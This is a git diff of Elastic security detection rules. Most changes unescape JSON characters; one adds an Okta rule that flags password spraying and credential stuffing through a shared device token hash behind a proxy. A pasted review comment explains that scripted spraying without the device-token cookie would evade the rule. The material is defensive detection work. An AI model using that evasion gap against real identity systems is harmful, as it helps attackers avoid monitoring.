b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_103.json index 1af3751a1ae..e0f6e517403 100644 --- a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_103.json +++ b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_103.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", 
@@ -64,7 +64,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -73,7 +73,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -82,7 +82,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_104.json b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_104.json index 63d9ba9afb5..ae9118c8194 100644 --- a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_104.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -63,7 +63,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -72,7 +72,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_105.json b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_105.json index 796ccbdb563..c3ddae0f51d 100644 --- a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_105.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -63,7 +63,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -72,7 +72,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_206.json b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_206.json index 383b67ea77c..494a740f89a 100644 --- a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_206.json +++ b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_206.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -63,7 +63,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -72,7 +72,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_103.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_103.json index ad00c0b8700..4b845aab17f 100644 --- a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_103.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_104.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_104.json index 9c91bc8d62d..32356d92489 100644 --- a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_104.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_105.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_105.json index 9a7026e4370..724e556caa3 100644 --- a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_105.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_106.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_106.json index 83822854605..60570770031 100644 --- a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_106.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_107.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_107.json index 4f03255f67b..5239992594f 100644 --- a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_107.json +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_107.json 
@@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_1.json index 63d050b4239..83c0e1eb171 100644 --- a/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_2.json
new file mode 100644
index 00000000000..fb85d789285
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_2.json
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when Okta user authentication events are reported for multiple users with the same device token hash behind a proxy.", + "false_positives": [ + "An Okta admnistrator may be logged into multiple accounts from the same host for legitimate reasons.", + "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", + "Shared systems such as Kiosks and conference room computers may be used by multiple users." + ], + "from": "now-9m", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Multiple Okta User Auth Events with Same Device Token Hash Behind a Proxy", + "note": "## Triage and analysis\n\n### Investigating Multiple Okta User Auth Events with Same Device Token Hash Behind a Proxy\n\nThis rule detects when Okta user authentication events are reported for multiple users with the same device token hash behind a proxy. 
This may indicate that a shared device between users, or that a user is using a proxy to access multiple accounts for password spraying.\n\n#### Possible investigation steps:\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n - Since the device is behind a proxy, the `okta.client.ip` field will not be useful for determining the actual device IP address.\n- Review the `okta.request.ip_chain` field for more information about the geographic location of the proxy.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n- Examine the `okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n- Users may share an endpoint 
related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n", + "query": "event.dataset:okta.system\n and not okta.actor.id:okta* and okta.debug_context.debug_data.dt_hash:*\n and okta.event_type:user.authentication* and okta.security_context.is_proxy:true\n", + "references": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + 
"https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.actor.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.debug_context.debug_data.dt_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.event_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.security_context.is_proxy", + "type": "boolean" + } + ], + "risk_score": 47, + "rule_id": "50887ba8-7ff7-11ee-a038-f661ea17fbcd", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + }, + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.004", + "name": "Credential Stuffing", + "reference": "https://attack.mitre.org/techniques/T1110/004/" + } + ] + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "okta.actor.id", + "value": 3 + } + ], + "field": [ + "okta.debug_context.debug_data.dt_hash" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + 
"version": 2 + }, + "id": "50887ba8-7ff7-11ee-a038-f661ea17fbcd_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_1.json b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_1.json index 193ed153651..678d93fe96a 100644 --- a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_1.json +++ b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_1.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_2.json b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_2.json index 8984238a4cc..a89a6ce3ca5 100644 --- a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_2.json +++ b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_2.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_3.json b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_3.json index 37ca409d431..f9fb21f8361 100644 --- a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_3.json +++ b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_3.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
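Review bot: The query's `okta.debug_context.debug_data.dt_hash:*` clause means only authentication events that carry a device token hash are counted toward the cardinality threshold, so scripted spraying that never persists Okta's device-token cookie would presumably not be counted at all — that is worth stating as a known coverage limit in `description` or the `note` so analysts do not read a lack of alerts as absence of spraying. The query also places no constraint on `okta.outcome.result`, so successful and failed authentications both accumulate toward the three-actor threshold; the triage guide asks the analyst to check the outcome, but the description should say the rule is outcome-agnostic so that failed-only spraying and successful shared-device logins are both expected triggers. Two typos in the new text: `"An Okta admnistrator may be logged into multiple accounts..."` should read `administrator`, and `resetting passwords for the users involves` in the note should read `involved`. The two separate `T1110` technique entries could be merged into a single entry carrying both `T1110.003` and `T1110.004` in its `subtechnique` array, if the rule schema used here accepts that form.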
diff --git a/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_1.json b/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_1.json index f67694e7d78..cca65836d3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_1.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_102.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_102.json index 8f51fdf8107..8a42378401a 100644 --- a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_102.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", "note": "", - "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", 
@@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_103.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_103.json index 445fc557dcf..0dfd7a52930 100644 --- a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_103.json 
@@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", "note": "", - "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", @@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_104.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_104.json index fa6f85b9f6e..9483711b23b 100644 --- a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_104.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", "note": "", - "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", 
@@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_105.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_105.json index 08b0aed1591..264bfb1a4c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_105.json 
@@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", "note": "", - "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", @@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
